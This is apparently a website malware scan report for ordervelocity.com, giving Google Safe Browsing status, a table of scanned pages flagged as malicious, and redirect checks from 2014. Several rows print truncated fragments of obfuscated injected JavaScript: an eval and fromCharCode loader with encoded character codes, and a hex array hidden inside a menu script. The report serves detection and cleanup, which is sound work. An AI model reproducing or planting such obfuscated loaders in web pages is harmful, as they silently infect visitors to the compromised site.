Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ordervelocity.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ordervelocity.com/ | 200 OK Content-Length: 12399 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,63,5e,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,63,5e,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5f,61,5e,6c,6f,26,5b,67,65,27,59,5b,6c,61,67,66,68,59,63,27,5c,6c,5c,2 Antivirus reports:
| ||
http://ordervelocity.com/fw_menu.js | 200 OK Content-Length: 31532 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_findObj(n, d) { asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x62,0x72,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x7 Antivirus reports:
| ||
http://ordervelocity.com/index.html | 200 OK Content-Length: 12399 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,63,5e,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,63,5e,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5f,61,5e,6c,6f,26,5b,67,65,27,59,5b,6c,61,67,66,68,59,63,27,5c,6c,5c,2 Antivirus reports:
| ||
http://ordervelocity.com/cu70b9.html?w=cu | 200 OK Content-Length: 11855 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;fff="fromCh"+"a"+"rCode";ff=ff[fff];zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,63,5e,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,63,5e,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,5f,61,5e,6c,6f,26,5b,67,65,27,59,5b,6c,61,67,66,68,59,63,27,5c,6c,5c,2 Antivirus reports:
| ||
http://ordervelocity.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ordervelocity.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 23:32:19 GMT
Accept-Ranges: bytes
ETag: "306f-4da5972189200"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12399
Content-Type: text/html
Last-Modified: Sun, 14 Apr 2013 22:13:28 GMT
X-Pad: avoid browser bug
...12399 bytes of data.
GET / HTTP/1.1
Host: ordervelocity.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 23:32:19 GMT
Accept-Ranges: bytes
ETag: "306f-4da5972189200"
Server: Apache
Vary: Accept-Encoding
Content-Length: 12399
Content-Type: text/html
Last-Modified: Sun, 14 Apr 2013 22:13:28 GMT
X-Pad: avoid browser bug
...12399 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ordervelocity.com
Referer: http://www.google.com/search?q=ordervelocity.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ordervelocity.com
Referer: http://www.google.com/search?q=ordervelocity.com
Result:
The result is similar to the first query. There are no suspicious redirects found.